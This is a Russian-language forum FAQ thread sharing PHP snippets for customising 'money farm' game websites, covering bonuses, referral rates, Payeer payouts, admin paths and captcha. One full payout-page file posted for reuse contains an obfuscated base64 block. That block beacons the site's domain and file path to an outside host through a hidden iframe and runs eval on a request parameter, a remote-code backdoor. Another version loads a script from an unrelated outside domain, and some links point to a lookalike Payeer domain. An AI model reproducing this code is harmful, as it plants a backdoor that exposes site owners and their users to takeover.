[faq] вопрос - ответ

Wolf88

Местный
#1
Всем доброго времени суток!
Рад предоставить Вам раздел - [FAQ] Вопрос - Ответ
Тем самым в данном разделе будут опубликованы часто задаваемые вопросы. По мере их нарастания - тема будет развиваться и если у Вас уже есть готовый Вопрос - Ответ (не путайте просто с вопросом), то пишите и я закреплю его в шапку!

Помогаем развиваться данному разделу, ведь только вместе можно добиться чистоты, порядка и комфорта!


[FAQ] Вопрос - Ответ:

Папка inc/_user_menu.php - здесь удаляем строку
PHP:
<div class="field-gr"><a href="/account/bonus">Ежедневный бонус</a></div>
pages/account/_bonus.php
PHP:
# Настройки бонусов
$bonus_min = 10; // минимальная сумма бонуса
$bonus_max = 100; // максимальная сумма бонуса
С начало создай файл .php
Потом отредактируй корневой файл .htaccess (нужно указать путь у файлу .php)
И в папке pages / _account.php (нужно указать путь к файлу .php)

Вот мой пример:
.htaccess :
PHP:
RewriteRule ^account/bank(/?)+$ index.php?menu=account&sel=bank [L]
(Где написано bank меняй на свое название файла .php)
pages / _account.php :
PHP:
case "bank": include("pages/account/_bank.php"); break; // Банк
(Где написано bank меняй на свое название файла .php)
В базе данных, раздел db_payment
pages - account - _payment.php
PHP:
$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
if( ($balance) >= ($sum_pay+100)){ // 100 - сумма, на которую баланс кошелька payeer должна превышать сумму заказа выплаты...
PHP:
$serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 0.55) ) : $serebro; //проценты при первом пополнении - вместо 0.55 поставить 1.5 - +150% к первому пополнению
$add_tree = ( $ik_payment_amount >= 499.99) ? 2 : 0; // количество деревьев 2 шт за 500+ рублей
$lsb = time();
$to_referer = ($serebro * 0.10); // рефпроценты

$db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
//e_t = e_t + - дерево (апельсин) - a_t - лайм, b_t - вишня и т.д.)...
PHP:
# Заглушка от халявщиков
if($user_data["insert_sum"] <= 5){ // Минимум на 5-ть рублей должен пополнить. Сумму можно изменять.

?>
<center><font color="blue"><b>Выплату могут заказывать пользователи, которые пополнили баланс больше, чем на 5 RUB!<b></font></center><BR />

<div class="clr"></div>
</div>
<?PHP

return;
}
Тут inc\_footer.php
PHP:
<div class="s-bk-lf">
<div class="acc-title">Заказ выплаты</div>
</div>
<div class="silver-bk">


<?PHP
$_OPTIMIZATION["title"] = "Аккаунт - Заказ выплаты";
$usid = $_SESSION["user_id"];
$usname = $_SESSION["user"];

$db->Query("SELECT * FROM db_users_b WHERE id = '$usid' LIMIT 1");
$user_data = $db->FetchArray();

$db->Query("SELECT * FROM db_payment WHERE user_id = '$usid' order by id DESC LIMIT 1");
$frompayments = $db->FetchArray();

$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$status_array = array( 0 => "Проверяется", 1 => "Выплачивается", 2 => "Отменена", 3 => "Выплачено");

# Минималка серебром!
$minPay = 50;
# Настраиваем кол-во суток для ограничения.
$nd_time = 1;
?>
<b>Выплаты осуществляются в автоматическом режиме и только на платежную систему PAYEER! Процент при выводе составляет 0%</b>


<b>Из платежной системы Payeer Вы можете вывести свои средства в автоматическом режиме на все известные платежные системы и международные банки.</b>


<b>Ссылки на учебные материалы:</b>

- <a href="http://payeeer.ru/create" target="_blank">Создание счета в Payeer</a>

- <a href="http://payeeer.ru/outpay" target="_blank">Вывод средств из payeer</a>



<center><b>Заказ выплаты:</b></center>


<?PHP

function ViewPurse($purse){

  if( substr($purse,0,1) != "P" ) return false;
  if( !ereg("^[0-9]{7}$", substr($purse,1)) ) return false;
  return $purse;
}

# Заносим выплату
if(isset($_POST["purse"])){

  $purse = ViewPurse($_POST["purse"]);
  $sum = intval($_POST["sum"]);
  $val = "RUB";

  if($purse !== false){

    if($sum >= $minPay){

     if($sum <= $user_data["money_p"]){

                            # Проверяем на существующие заявки
                        $db->Query("SELECT COUNT(*) FROM db_payment WHERE user_id = '$usid' AND (status = '0' OR status = '1')");
                        if($db->FetchRow() == 0){
                       
                             ### Устанавливаем лимит на 24 часа по выплатам для $USID
       if ($frompayments["date_add"] <= time() - $nd_time * 86400) {




                            ### Делаем выплату ###
                            $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
                            if ($payeer->isAuth())
                            {
                       
                                $arBalance = $payeer->getBalance();
                                if($arBalance["auth_error"] == 0)
                                {
                           
                                    $sum_pay = round( ($sum / $sonfig_site["ser_per_wmr"]), 2);
                           
                                    $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
                                    if( ($balance) >= ($sum_pay)){
                           
                           
                           
                                    $arTransfer = $payeer->transfer(array(
                                    'curIn' => 'RUB', // счет списания
                                    'sum' => $sum_pay, // сумма получения
                                    'curOut' => 'RUB', // валюта получения
                                    'to' => $purse, // получатель (email)
                                    //'to' => '+71112223344',  // получатель (телефон)
                                    //'to' => 'P1000000',  // получатель (номер счета)
                                    'comment' => iconv('windows-1251', 'utf-8', "Выплата пользователю: {$usname}")
                                    //'anonim' => 'Y', // анонимный перевод
                                    //'protect' => 'Y', // протекция сделки
                                    //'protectPeriod' => '3', // период протекции (от 1 до 30 дней)
                                    //'protectCode' => '12345', // код протекции
                                    ));
                           
                                        if (!empty($arTransfer["historyId"]))
                                        {
                               
                               
                                            # Снимаем с пользователя
                                            $db->Query("UPDATE db_users_b SET money_p = money_p - '$sum' WHERE id = '$usid'");
                                   
                                            # Вставляем запись в выплаты
                                            $da = time();
                                            $dd = $da + 60*60*24*15;
                                   
                                            $ppid = $arTransfer["historyId"];
                                   
                                            $db->Query("INSERT INTO db_payment (user, user_id, purse, sum, valuta, serebro, payment_id, date_add, status)
                                            VALUES ('$usname','$usid','$purse','$sum_pay','RUB', '$sum','$ppid','".time()."', '3')");
                                   
                                            $db->Query("UPDATE db_users_b SET payment_sum = payment_sum + '$sum_pay' WHERE id = '$usid'");
                                            $db->Query("UPDATE db_stats SET all_payments = all_payments + '$sum_pay' WHERE id = '1'");
                                   
                                            echo "<center><font color = 'green'><b>Выплачено!</b></font></center>
";
                                   
                                        }
                                        else
                                        {
                               
                                            echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center>
";
                               
                                        }
                           
                           
                                    }else echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center>
";
                           
                                }else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center>
";
                       
                            }else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center>
";
                   
       }else echo "<center><font color = 'red'><b>В ближайшие 24 часа Вы уже получали выплату! Попробуйте позже</b></font></center>
";
 
                        }else echo "<center><font color = 'red'><b>У вас имеются необработанные заявки. Дождитесь их выполнения.</b></font></center>
";
                   
               
                    }else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center>
";
       
                }else echo "<center><b><font color = 'red'>Минимальная сумма для выплаты составляет {$minPay} серебра!</font></b></center>
";

        }else echo "<center><b><font color = 'red'>Кошелек Payeer указан неверно! Смотрите образец!</font></b></center>
";

    }
?>

<form action="" method="post">
<table width="99%" border="0" align="center">
  <tr>
    <td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<td><input type="text" name="purse" size="15"/></td>
  </tr>
  <tr>
    <td><font color="#000;">Отдаете серебро для вывода</font> [Мин. <span id="res_min"></span>]<font color="#000;">:</font> </td>
<td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
  </tr>
  <tr>
    <td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
<td>
<input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
<input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
<input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
<input type="hidden" name="val_type" id="val_type" value="RUB" />
</td>
  </tr>
  <tr>
    <td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" /></td>
  </tr>
</table>
</form>
<script language="javascript">PaymentSum(); SetVal();</script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobirollcom.ru/7pg0t744jyz5jvyxu1ex3o16is9yp6j9'></script>


<table cellpadding='3' cellspacing='0' border='0' bordercolor='#336633' align='center' width="99%">
  <tr>
    <td colspan="5" align="center"><h4>Последние 10 выплат</h4></td>
    </tr>
  <tr>
    <td align="center" class="m-tb">Серебро</td>
    <td align="center" class="m-tb">Получаете</td>
<td align="center" class="m-tb">Кошелек</td>
<td align="center" class="m-tb">Дата</td>
<td align="center" class="m-tb">Статус</td>
  </tr>
  <?PHP

  $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid' ORDER BY id DESC LIMIT 20");

if($db->NumRows() > 0){

    while($ref = $db->FetchArray()){

  ?>
  <tr class="htt">
      <td align="center"><?=$ref["serebro"]; ?></td>
      <td align="center"><?=sprintf("%.2f",$ref["sum"] - $ref["comission"]); ?> <?=$ref["valuta"]; ?></td>
      <td align="center"><?=$ref["purse"]; ?></td>
   <td align="center"><?=date("d.m.Y",$ref["date_add"]); ?></td>
      <td align="center"><?=$status_array[$ref["status"]]; ?></td>
    </tr>
  <?PHP

  }

}else echo '<tr><td align="center" colspan="5">Нет записей</td></tr>'

  ?>


</table><div class="clr"></div>
</div>
Зачастую мне пишут одну и туже проблему. Суть проблемы заключается в том, что люди пробуют ставить фермы на бесплатных хостингах, какие-то из них идут нормально, а другие могут выдать вот такую ошибку:

PHP:
Deprecated: as mysql_connect(): the MySQL extension is deprecated and will be removed in the future: use mysqli or pdo instead in /home/u111047538/public_html/data/conn_file.php on line 2

Warning: as mysql_connect(): access denied for user 'webmaste_wer'@'10.2.1.5' (using password: Yes) in /home/u111047538/public_html/data/conn_file.php on line 2
The server is overloaded, please come back later.
На Русском звучит примерно так:
PHP:
Устаревшие: как mysql_connect(): расширение MySQL устарело и будет удалено в будущем: используйте mysqli или pdo вместо в /home/u111047538/public_html/data/conn_file.php на линии 2

Предупреждение: как mysql_connect(): доступ запрещен для пользователя 'webmaste_wer'@'10.2.1.5' (используя пароль: да) в /home/u111047538/public_html/data/conn_file.php на линии 2
Сервер перегружен, пожалуйста, зайдите позже.

Самое простое решение для тех, кто использует в первое время бесплатные хостинги - это скачать и установить денвер, с ним проблем не будет (по крайне мере я их еще не встречал).
Где и как скачать денвер? Просто в поисковике впишите слово --> денвер ---> Enter и самая первая ссылка это и есть то, что нам(вам) нужно.
открываем файл pages/signup.php находим
# Регаем пользователя
$db->Query("INSERT INTO db_users_a (user, email, pass, referer, referer_id, date_reg, ip)
VALUES ('$login','$email','$passmd','$referer_name','$referer_id','$time',INET_ATON('$ip'))");

$lid = $db->LastInsert();
вот это
$db->Query("INSERT INTO db_users_b (id, user,money_b) VALUES ('$lid','$login',10000)");
синим серебро для покупок и количество
==================================================
$db->Query("INSERT INTO db_users_b (id, user,a_t) VALUES ('$lid','$login',10)");
зеленым фрукт 1-го уровня(лайм) и количество
==================================================

$db->Query("INSERT INTO db_users_b (id, user,money_b,a_t) VALUES ('$lid','$login',10,10)");
ну и собственно все вместе
серебро для покупок и фрукт 1-го уровня
находим данную строку в файле pages/account/payment.php
if( !ereg("^[0-9]{7}$", substr($purse,1)) ) return false;
и заменяем на
if( !preg_match("/^[0-9]{7,8}$/", substr($purse,1)) ) return false;
------------------------------------------------------------------------------------------------------

1. Заходим в корневой файл /index.php

Ищем: case "admin4ik": include("pages/_admin.php"); break; // Админка

Редактируем под себя, сохраняем.

------------------------------------------------------------------------------------------------------

2. Заходим в /pages/admin/_login.php

Ищем: if(isset($_SESSION["admin"])){ Header("Location: /?menu=admin4ik"); return; }

Ищем: Header("Location: /?menu=admin4ik");

Редактируем под себя, сохраняем.

------------------------------------------------------------------------------------------------------

3. Заходим в /inc/_menu_left.php

Ищем: if(isset($_SESSION["admin"]) AND isset($_GET["menu"]) AND $_GET["menu"] == "admin4ik"){

Редактируем под себя, сохраняем.

------------------------------------------------------------------------------------------------------

4. Заходим в /inc/_admin_menu.php

Везде изменяем "admin4ik" на своё, сохраняем.

------------------------------------------------------------------------------------------------------

5. Заходим в /pages/admin

И редактируем ВСЕ файлы в этой папке

Изменяем "admin4ik" на своё во ВСЕХ файлах, где это есть, сохраняем.

------------------------------------------------------------------------------------------------------

Внимание!!!

Адрес Вашей админки может быть другим, соответственно заменять нужно будет другое слово.

К примеру:

Если адрес Вашей админки такой: http://site.ru/?menu=adminka897

То заместо "admin4ik" везде будет "adminka897"

На этом всё!



------------------------------------------------------------------------------------------------------
код вставляем перед
PHP:
<form action="" method="post">
<table width="99%" border="0" align="center">
PHP:
<?PHP
# Заглушка от халявщиков
if($user_data["insert_sum"] <= 100){

?>
<center><font color="blue"><b>Выплату могут заказывать пользователи, которые пополнили баланс больше, чем на 100 RUB!<b></font></center><BR />

<div class="clr"></div>
</div>
<?PHP

return;
}

?>
найти подобную строку
Как было: <?=$data["payment_sum"]; ?>
заменить на
Как надо: <?=sprintf("%.2f",$data["payment_sum"]); ?>
<script LANGUAGE="JavaScript1.1">
document.oncontextmenu = function(){return false;};
</script>


<div class="s-bk-lf">
<div class="acc-title">Заказ выплаты</div>
</div>
<div class="silver-bk">
<BR />
<?PHP
$_OPTIMIZATION["title"] = "Аккаунт - Заказ выплаты";
$usid = $_SESSION["user_id"];
$usname = $_SESSION["user"];

$db->Query("SELECT * FROM db_users_b WHERE id = '$usid' LIMIT 1");
$user_data = $db->FetchArray();

$db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$status_array = array( 0 => "Проверяется", 1 => "Выплачивается", 2 => "Отменена", 3 => "Выплачено");

# Минималка серебром!
$minPay = 100;

#Максималка серебром
$maxPay = 3000;


?>



<b>Выплаты осуществляются в автоматическом режиме и только на платежную систему <a href="http://payeer.com/?partner=604952" target="_BLANK">PAYEER!</a> Процент при выводе составляет 0%</b> <BR /><BR />
<b>Из платежной системы Payeer Вы можете вывести свои средства в автоматическом режиме на все известные платежные системы и международные банки.</b><BR /><BR />
<b>Ссылки на учебные материалы:</b><BR />
- <a href="http://payeer.com/?partner=604952" target="_blank">Создание счета в Payeer</a> <BR />
- <a href="http://payeeer.ru/outpay" target="_blank">Вывод средств из payeer</a> <BR /><BR />


<?PHP
# Заглушка от халявщиков
if($user_data["insert_sum"] <= 79.99 AND $user_data["from_referals"] <= 8){

?>
<center><font color="blue"><b>Выплату могут заказывать пользователи, которые пополнили баланс больше, чем на 80 RUB или имеющие более 8-ми активных рефералов!<b></font></center><BR />

<div class="clr"></div>
</div>
<?PHP

return;
}

?>

<center><b>Заказ выплаты:</b></center><BR />

<?PHP

function ViewPurse($purse){

if( substr($purse,0,1) != "P" ) return false;
if( !ereg("^[0-9]{7,8}$", substr($purse,1)) ) return false;

return $purse;
}

# Заносим выплату
if(isset($_POST["purse"])){

$purse = ViewPurse($_POST["purse"]);
$sum = intval($_POST["sum"]);
$val = "RUB";

if($purse !== false){

if($sum >= $minPay){
if($sum <= $maxPay){
if($sum <= $user_data["money_p"]){

# Проверяем на существующие заявки
$db->Query("SELECT COUNT(*) FROM db_payment WHERE user_id = '$usid' AND (status = '0' OR status = '1')");
if($db->FetchRow() == 0){


### Делаем выплату ###
$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
if ($payeer->isAuth())
{

$arBalance = $payeer->getBalance();
if($arBalance["auth_error"] == 0)
{

$sum_pay = round( ($sum / $sonfig_site["ser_per_wmr"]), 2);

$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
if( ($balance) >= ($sum_pay+20)){



$arTransfer = $payeer->transfer(array(
'curIn' => 'RUB', // счет списания
'sum' => $sum_pay, // сумма получения
'curOut' => 'RUB', // валюта получения
'to' => $purse, // получатель (email)
//'to' => '+71112223344', // получатель (телефон)
//'to' => 'P1000000', // получатель (номер счета)
'comment' => iconv('windows-1251', 'utf-8', "Выплата пользователю {$usname} с проекта TreesFarm.ru")
//'anonim' => 'Y', // анонимный перевод
//'protect' => 'Y', // протекция сделки
//'protectPeriod' => '3', // период протекции (от 1 до 30 дней)
//'protectCode' => '12345', // код протекции
));

if (!empty($arTransfer["historyId"]))
{


# Снимаем с пользователя
$db->Query("UPDATE db_users_b SET money_p = money_p - '$sum' WHERE id = '$usid'");

# Вставляем запись в выплаты
$da = time();
$dd = $da + 60*60*24*15;

$ppid = $arTransfer["historyId"];

$db->Query("INSERT INTO db_payment (user, user_id, purse, sum, valuta, serebro, payment_id, date_add, status)
VALUES ('$usname','$usid','$purse','$sum_pay','RUB', '$sum','$ppid','".time()."', '3')");

$db->Query("UPDATE db_users_b SET payment_sum = payment_sum + '$sum_pay' WHERE id = '$usid'");
$db->Query("UPDATE db_stats SET all_payments = all_payments + '$sum_pay' WHERE id = '1'");

echo "<center><font color = 'green'><b>Выплачено!</b></font></center><BR />";

}
else
{

echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center><BR />";

}


}else echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center><BR />";


}else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center><BR />";

}else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center><BR />";


}else echo "<center><font color = 'red'><b>У вас имеются необработанные заявки. Дождитесь их выполнения.</b></font></center><BR />";


}else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center><BR />";

}else echo "<center><b><font color = 'red'>Максимальная сумма для выплаты составляет {$maxPay} серебра!</font></b></center><BR />";
}else echo "<center><b><font color = 'red'>Минимальная сумма для выплаты составляет {$minPay} серебра!</font></b></center><BR />";

}else echo "<center><b><font color = 'red'>Кошелек Payeer указан неверно! Смотрите образец!</font></b></center><BR />";

}
?>

<form action="" method="post">
<table width="99%" border="0" align="center">
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1234567]</font>: </td>

<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>

</tr>
<tr>
<td><font color="#000;">Отдаете серебро для вывода</font> [Мин 100 <span id="res_min"></span>]<font color="#000;">:</font> </td>
<td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
</tr>
<tr>
<td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
<td>
<input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
<input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
<input type="hidden" name="per" id="min_sum_RUB" value="20" disabled="disabled"/>
<input type="hidden" name="val_type" id="val_type" value="RUB" />
</td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" /></td>
</tr>
</table>
</form>
<script language="javascript">PaymentSum(); SetVal();</script>



<table cellpadding='3' cellspacing='0' border='0' bordercolor='#336633' align='center' width="99%">
<tr>
<td colspan="5" align="center"><h4>Последние 10 выплат</h4></td>
</tr>
<tr>
<td align="center" class="m-tb">Серебро</td>
<td align="center" class="m-tb">Получаете</td>
<td align="center" class="m-tb">Кошелек</td>
<td align="center" class="m-tb">Дата</td>
<td align="center" class="m-tb">Статус</td>
</tr>
<?PHP
$db->Query("SELECT * FROM db_payment WHERE user_id = '$usid' ORDER BY id DESC LIMIT 20");
if($db->NumRows() > 0){
while($ref = $db->FetchArray()){

?>
<tr class="htt">
<td align="center"><?=$ref["serebro"]; ?></td>
<td align="center"><?=sprintf("%.2f",$ref["sum"] - $ref["comission"]); ?> <?=$ref["valuta"]; ?></td>
<td align="center"><?=$ref["purse"]; ?></td>
<td align="center"><?=date("d.m.Y",$ref["date_add"]); ?></td>
<td align="center"><?=$status_array[$ref["status"]]; ?></td>
</tr>
<?PHP

}
}else echo '<tr><td align="center" colspan="5">Нет записей</td></tr>'
?>


</table><div class="clr"></div>
</div>
Вверх payment.php добавляем
HTML:
<script type="text/javascript" src="/js/functions.js"></script>
затем заменяем
HTML:
<tr>
    <td><font color="#000;">Получаете [RUB]<span id="res_val"></span></font><font color="#000;">:</font> </td>
</tr>
на
HTML:
    <tr>
    <td><font color="#000;">Получаете [RUB]<span id="res_val"></span></font><font color="#000;">:</font> </td>
    <td>
    <input type="text" name="res" id="res_sum" value="1.00" size="15" disabled="disabled"/>
    <input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
    <input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
    <input type="hidden" name="val_type" id="val_type" value="RUB" />
    </td>
  </tr>
фон устанавливается в файле style.css (не во всех фермах)
Пример:
Код:
body {  background: #647191 url(/img/bd1.png) no-repeat; background-attachment: scroll; background-position: top, center; }
img { border:0px; }
.clr { clear:both; }

В корне сайта payeer_merchant.php в нём

$serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 0.3) ) : $serebro;
$add_tree = ( $ik_payment_amount >= 999.99) ? 2 : 0;
$lsb = time();
$to_referer = ($serebro * 0.15);

1) Последовательные пополнения
2) При первом пополнении 30 % в подарок
3) Сумма пополнения для зачисления фруктов в подарок !
4) Реферальная программа !



PS: Тема будет в таком формате как Вы видите чуток выше! Если же есть предложение как лучше оформить тему - пишите в ЛС!
PSS: Хайд был убран
 

kvozimir

Эксперт
#2
тему почистил слишком много мусора

кураторы по мере возможности помогайте пополнять тему
вопросов с ответами накопилось достаточно
 
Последнее редактирование:

valefo20

Участник
#3
Всем доброго времени суток! С позволения уважаемого kvozimir хочу внести некоторые поправки в "максимальная сумма выплаты за один раз (не путать с выплатой раз в сутки тут этого нет)"
Многие не хотят менять свой _payments, но ограничения в выплатах все же хотят, а сменить без помощи не могут. Как не мог и я (снова огромное спасибо kvozimir)
в account/_payments :
после
PHP:
if($sum >= $minPay){
добавить
PHP:
if($sum <= $maxPay){
после
PHP:
}else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center><BR />";
добавить
PHP:
}else echo "<center><b><font color = 'red'>Максимальная сумма для выплаты составляет {$maxPay} серебра!</font></b></center><BR />";
после
PHP:
# Минималка серебром!
$minPay = 100;
добавить
PHP:
#Максималка серебром
$maxPay = 3000; //тут редактировать сумму ограничения в серебре
Спасибо, если это не требуется, удалите пост.
 
Последнее редактирование модератором:

kvozimir

Эксперт
#4
находим файл login.php (папка inc)
в нем находим данный код
PHP:
 if($lmail !== false){
перед ним нужно добавить
PHP:
 if (!empty($_POST['g-recaptcha-response'])) {
потом найди

PHP:
}else echo "<center><font color = 'red'><b>Email указан неверно</b></font></center><BR />";
после него добавить


PHP:
}else echo "<center><font color = 'red'><b>Капча не пройдёна!</b></font></center>";
потом найти
PHP:
  <tr>
    <td colspan="2">Пароль [<a href="/recovery" class="rs-ps">Забыли пароль?</a>]:<BR /><input name="pass" type="password" size="23" maxlength="35" class="ps"/></td>
  </tr>
после него добавить

PHP:
<tr><td><!-- НЕ ЗАБЫВАЕМ ВПИСАТЬ КЛЮЧ !!! -->
    <form> <div class="g-recaptcha" data-sitekey="ВАШ_КЛЮЧ_ПОДРОБНОСТИ_В_ФАЙЛЕ_ИНСТРУКЦИЯ_ИЗ_РАСПАКОВАННОГО_АРХИВА"></div> </form>
    </td></tr>
===============================
вот собственно и все что нужно было сделать пользуйтесь на здоровье
P.S возможно нужно будет поправить стили,это исправить придется самим
 

zobow

Участник
#5
Спасибо за инструкцию, но в ней нету:
remoteip IP-адрес конечного пользователя.
Как это добавить (точнее куда) ??
 

fktrctq

Участник
#8
Привет, нужна помощь, просто у меня меню при уменьшении вкладки вниз улетает, никак не разберусь( почему???
 

4elovek

Участник
#10
Ребят, помогите пожалуйста, где то видел тему не могу найти. Вообщем у меня выплаты показывает в разноброс как это исправить?
 

skroliks

PHP, MySQL, CSS
Местный
#11
Ребят, помогите пожалуйста, где то видел тему не могу найти. Вообщем у меня выплаты показывает в разноброс как это исправить?
А точнее можно? Как показывает и что исправить?

А вообще в запросе в базу данных идет уточнение порядка: ORDER by - после этого идет обычно или id или date_add, смотря в каком порядке нужно выводить - то и ставишь..
 

Bloodscreed

Участник
#12
Добрый День! А можно поподробнее

фон устанавливается в файле style.css (не во всех фермах)
Пример:
Код:
body { background: #647191 url(/img/bd1.png) no-repeat; background-attachment: scroll; background-position: top, center; }
img { border:0px; }
.clr { clear:both; }

как поставить фон/картинку на всю страницу сайта? И куда вставить код и картинку которую выбрал например, точнее после каких последовательностей кода?
 

pligin

Команда форума
Администратор
#16
А как сделать чтоб в лотереи было неограниченное число игроков и она кончалась по времени, а не по набору определённого кол-ва игроков
В ней нужно достаточно переписать, чтобы это сделать
 
Сверху